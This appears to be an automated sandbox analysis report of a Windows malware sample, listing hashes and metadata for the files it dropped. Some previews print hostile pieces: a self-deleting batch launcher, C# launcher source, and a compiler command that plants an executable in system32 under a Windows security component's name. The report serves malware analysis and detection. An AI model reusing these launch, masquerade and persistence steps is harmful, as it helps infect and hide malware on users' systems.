                                                                                                                                    MD5:9F9FA9EFE67E9BBD165432FA39813EEA
                                                                                                                                    SHA1:6FE9587FB8B6D9FE9FA9ADE987CB8112C294247A
                                                                                                                                    SHA-256:4488EA75E0AC1E2DEB4B7FC35D304CAED2F877A7FB4CC6B8755AE13D709CF37B
                                                                                                                                    SHA-512:F4666179D760D32871DDF54700D6B283AD8DA82FA6B867A214557CBAB757F74ACDFCAD824FB188005C0CEF3B05BF2352B9CA51B2C55AECF762468BB8F5560DB3
                                                                                                                                    Malicious:false
                                                                                                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..
                                                                                                                                    Process:C:\Users\user\Desktop\W4tW72sfAD.exe
                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):1799
                                                                                                                                    Entropy (8bit):5.370158927802367
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:48:MxHKQwYHKGSI6oPtHTHhAHKKkrJH1H6HNp51qHGIs0HKD:iqbYqGSI6oPtzHeqKktVatp5wmj0qD
                                                                                                                                    MD5:7A6E8555AFA76BA984C7770574F2E66D
                                                                                                                                    SHA1:5ABEB64A4114833C1CAC45417883B8085E17E1B0
                                                                                                                                    SHA-256:A4FA0C6D687B4FCCD1C77657CFCBAC630CFCE48FBE530BD175DD06B3DB5FB5E9
                                                                                                                                    SHA-512:0F872399E40BC5FCF63956692CC70E4FDCD460BFE60CD0F6F7BD694CAEF8F87704846CA274E9F10114EC91C554CAD22E834BAAD38D50A4101E9DA9A4F5B6C14A
                                                                                                                                    Malicious:false
                                                                                                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..2,"System.Security, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Net.Http, Version=4.0.0.0, Culture=neutral, PublicKey
                                                                                                                                    Process:C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    File Type:CSV text
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):847
                                                                                                                                    Entropy (8bit):5.354334472896228
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQwYHKGSI6oPtHTHhAHKKkb
                                                                                                                                    MD5:9F9FA9EFE67E9BBD165432FA39813EEA
                                                                                                                                    SHA1:6FE9587FB8B6D9FE9FA9ADE987CB8112C294247A
                                                                                                                                    SHA-256:4488EA75E0AC1E2DEB4B7FC35D304CAED2F877A7FB4CC6B8755AE13D709CF37B
                                                                                                                                    SHA-512:F4666179D760D32871DDF54700D6B283AD8DA82FA6B867A214557CBAB757F74ACDFCAD824FB188005C0CEF3B05BF2352B9CA51B2C55AECF762468BB8F5560DB3
                                                                                                                                    Malicious:false
                                                                                                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..
                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                    File Type:data
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):64
                                                                                                                                    Entropy (8bit):1.1510207563435464
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:3:Nlllullkv/tz:NllU+v/
                                                                                                                                    MD5:6442F277E58B3984BA5EEE0C15C0C6AD
                                                                                                                                    SHA1:5343ADC2E7F102EC8FB6A101508730898CB14F57
                                                                                                                                    SHA-256:36B765624FCA82C57E4C5D3706FBD81B5419F18FC3DD7B77CD185E6E3483382D
                                                                                                                                    SHA-512:F9E62F510D5FB788F40EBA13287C282444607D2E0033D2233BC6C39CA3E1F5903B65A07F85FA0942BEDDCE2458861073772ACA06F291FA68F23C765B0CA5CA17
                                                                                                                                    Malicious:false
                                                                                                                                    Process:C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):98304
                                                                                                                                    Entropy (8bit):0.08235737944063153
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                                                    MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                                                    SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                                                    SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                                                    SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                                                    Malicious:false
                                                                                                                                    Process:C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):114688
                                                                                                                                    Entropy (8bit):0.9746603542602881
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                    MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                    SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                    SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                    SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                    Malicious:false
                                                                                                                                    Process:C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):40960
                                                                                                                                    Entropy (8bit):0.8553638852307782
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                    Malicious:false
                                                                                                                                    Process:C:\Users\user\Desktop\W4tW72sfAD.exe
                                                                                                                                    File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):180
                                                                                                                                    Entropy (8bit):5.326797283812452
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:3:mKDDVNGvTVLuVFcROr+jn9m1WDEQC3yRsrs/X62dAZBktKcKZG1t+kiE2J5xAI4q:hCRLuVFOOr+DE1WD50rsfxAZKOZG1wku
                                                                                                                                    MD5:B133C07E7A46B24F0C44C751D441ADF7
                                                                                                                                    SHA1:5F1F5BBD52FE3B147D8150C57C1B5C4F222EEB8C
                                                                                                                                    SHA-256:364D3B584C5CD3B90DA3DC1E9B68632F911D44452CBBB383DD39EBF3E1859BE1
                                                                                                                                    SHA-512:08C32EDFC13E1D2DC9B0B10E7F6F06ABCCB63CB384E7911270BE08F6FCE4B23E87D7F1101FBBA78F8CB056D592C77835894E6FB2F4131876F8FC6CFA42577464
                                                                                                                                    Malicious:true
                                                                                                                                    Antivirus:
                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                    Preview:@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Users\Default User\juptXkyeRvGsIZrQGeVEsrnWhD.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\9x00cPKFqM.bat"
                                                                                                                                    Process:C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):40960
                                                                                                                                    Entropy (8bit):0.8553638852307782
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                    Malicious:false
                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                    File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x6ec, 10 symbols, created Fri Apr 19 12:52:07 2024, 1st section name ".debug$S"
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):1956
                                                                                                                                    Entropy (8bit):4.553278669032398
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:24:HAO9/OgtUtDfHfwKEsmNyluxOysuZhN7jSjRzPNnqpdt4+lEbNFjMyi0+QlUZ:ogyxIKhmMluOulajfqXSfbNtmh1Z
                                                                                                                                    MD5:5AE6667D997C3CABAE086CECF18E85CA
                                                                                                                                    SHA1:099F1CEE880D43B40C22680D91B26867092ACBBD
                                                                                                                                    SHA-256:96724EB587574A98D270384C67C73C136B7092E73D3A65D8DE61E202DD4D486E
                                                                                                                                    SHA-512:75B190710A516EA2490B1BAD275E2AB28616E2E4535CE6E04C1FA196DD00DE15E559CAC208C30FA7624A9CE90CC4EBDCE1544972561260CFA8259F8478821FB7
                                                                                                                                    Malicious:false
                                                                                                                                    Preview:L....h"f.............debug$S........<...................@..B.rsrc$01................h...........@..@.rsrc$02........p...|...............@..@........=....c:\Windows\System32\CSCC6B1193CD9FE40B5844F837FF967B9E7.TMP.....................r.av..t.y..............4.......C:\Users\user\AppData\Local\Temp\RESCC57.tmp.-.<....................a..Microsoft (R) CVTRES.^.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe......................... .......8.......................P.......................h.......................................................|...............................................|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.H.e.
                                                                                                                                    Process:C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):106496
                                                                                                                                    Entropy (8bit):1.1358696453229276
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                    MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                    SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                    SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                    SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                    Malicious:false
                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):60
                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                    Malicious:false
                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                    Process:C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):106496
                                                                                                                                    Entropy (8bit):1.1358696453229276
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                    MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                    SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                    SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                    SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                    Malicious:false
                                                                                                                                    Process:C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):114688
                                                                                                                                    Entropy (8bit):0.9746603542602881
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                    MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                    SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                    SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                    SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                    Malicious:false
                                                                                                                                    Process:C:\Users\user\Desktop\W4tW72sfAD.exe
                                                                                                                                    File Type:C++ source, Unicode text, UTF-8 (with BOM) text
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):424
                                                                                                                                    Entropy (8bit):5.1173838837912085
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:12:V/DNVgtDIbSf+eBLZ7bfiFkMSf+eBL6H+sddsfRiFkD:JNVQIbSfhV7TiFkMSfhWH+svsf4FkD
                                                                                                                                    MD5:81AECD38F24EF1E03485CFF5F0A1C964
                                                                                                                                    SHA1:8EE1A50966720EEF47C8B0016725AE96FB58CEE9
                                                                                                                                    SHA-256:EF4C2683B75B553C1A4699EBA9FD65947C561E61AE8D607114A3F70E50FCC4E4
                                                                                                                                    SHA-512:41C833A7649371BEE36247395FA3CDE8B15C5D44A4D0F9B379A8D5019085F30E3411A48F9BDAA1C6FDCB698A0D2441B180BEC1871D058E23DD42C51444187738
                                                                                                                                    Malicious:false
                                                                                                                                    Preview:.using System.Diagnostics;.using System.Threading;..class Program.{. static void Main(string[] args). {. new Thread(() => { try { Process.Start(@"C:\Windows\system32\SecurityHealthSystray.exe.exe", string.Join(" ", args)); } catch { } }).Start();. new Thread(() => { try { Process.Start(@"C:\Program Files\Microsoft Office 15\ClientX64\juptXkyeRvGsIZrQGeVEsrnWhD.exe"); } catch { } }).Start();. }.}.
                                                                                                                                    Process:C:\Users\user\Desktop\W4tW72sfAD.exe
                                                                                                                                    File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):250
                                                                                                                                    Entropy (8bit):5.0902373250756705
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:6:Hu+H2L//1xRT0T79BzxsjGZxWE8owkn23fVVDH:Hu7L//TRq79cQWfNdH
                                                                                                                                    MD5:2E81ECD0DA70073B0C69D919DC587A6E
                                                                                                                                    SHA1:4EE202522A6B94A6D6C1768D43C4E3748DCD9CDF
                                                                                                                                    SHA-256:6EBE15B3FABF2D3365983ADB8C5B22D611D26C61F7D50AE72D9499A1993D6CA9
                                                                                                                                    SHA-512:1AB7F5C61BF54114D73CB9DE0393F5A49F305313F75CCC3AE9E0476C24E605B9A9D389264D415F527179AA8CD50A6A9795A20B118250B6EF05FD61BCABD6EFCD
                                                                                                                                    Malicious:true
                                                                                                                                    Preview:./t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\eqmixkc3\eqmixkc3.0.cs"
                                                                                                                                    Process:C:\Users\user\Desktop\W4tW72sfAD.exe
                                                                                                                                    File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (329), with CRLF, CR line terminators
                                                                                                                                    Category:modified
                                                                                                                                    Size (bytes):750
                                                                                                                                    Entropy (8bit):5.261212638967308
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:12:KJN/I/u7L//TRq79cQWfNdOKaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:KJBI/un/Vq79tWfNgKax5DqBVKVrdFAw
                                                                                                                                    MD5:77A94EBD01B96CFCB9433A79E7157A20
                                                                                                                                    SHA1:6B3C74E7F164F5E6037873A9E7FD7DD32329AA1E
                                                                                                                                    SHA-256:309ED2DE43B38B2CAC3ABD7E26FCF0F4AE22D04F6B0C63D77443EACC55C6C34F
                                                                                                                                    SHA-512:36893CCDFA556E0975FAB4E2342357DF6A6CB40923D64DA9B80D06B41FE7170E84CF44B1876DD9BB15056DEFAEBCC0A115C943CA69C21880A7AC8C1F7F8F3542
                                                                                                                                    Malicious:false
                                                                                                                                    Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\eqmixkc3\eqmixkc3.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                                                                                                    Process:C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):25
                                                                                                                                    Entropy (8bit):4.103465189601645
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:3:QsWSk6L:Qs26L
                                                                                                                                    MD5:6D9DE2497B85EEC2D838184850B6B532
                                                                                                                                    SHA1:3DF4611D793BD41032AF8C15A04054D186D1F262
                                                                                                                                    SHA-256:58CA9A6962D439F82D6EEE40F7BF3B64DFF0A48B3A5280BA974D548ECBB81CCB
                                                                                                                                    SHA-512:2C746A7360CD993267B701088214D51F8E1C492148C75DAED64A512002C2367517B616BA222178F351F06ACF19A264DADECCC23D2182A7CEBE89C392EEE9F070
                                                                                                                                    Malicious:false
                                                                                                                                    Preview:xhxoKdfsty84wH7vMz7eKdd17
                                                                                                                                    Process:C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):20480
                                                                                                                                    Entropy (8bit):0.5707520969659783
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                    MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                                                    SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                                                    SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                                                    SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                                                    Malicious:false
                                                                                                                                    Process:C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):28672
                                                                                                                                    Entropy (8bit):2.5793180405395284
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                                                    MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                                                    SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                                                    SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                                                    SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                                                    Malicious:false
                                                                                                                                    Process:C:\Users\user\Desktop\W4tW72sfAD.exe
                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):25
                                                                                                                                    Entropy (8bit):4.323856189774724
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:3:GWKtElD:R
                                                                                                                                    MD5:7A0EA4D818806ACD9568F682B0E632E2
                                                                                                                                    SHA1:8B2BDB6F9CF15390DB9E9480C39B3D9C230315C5
                                                                                                                                    SHA-256:98A3271F992CC62DCFC22C7FF57928486D710F4310D01268F7BB6543C154446F
                                                                                                                                    SHA-512:371299FC859501224DA326D838DDE1B0714B5553090A705152A3FA65281A15C2C4E4A82B955FDDA5488D52EC150F266AB13A00FC287A2BC3B3F1967793AA103F
                                                                                                                                    Malicious:false
                                                                                                                                    Preview:coQjZ96rg9EB3obhaJfRLlgZY
                                                                                                                                    Process:C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):49152
                                                                                                                                    Entropy (8bit):0.8180424350137764
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                    MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                    SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                    SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                    SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                    Malicious:false
                                                                                                                                    Process:C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):20480
                                                                                                                                    Entropy (8bit):0.5712781801655107
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                    MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                                                    SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                                                    SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                                                    SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                                                    Malicious:false
                                                                                                                                    Process:C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):20480
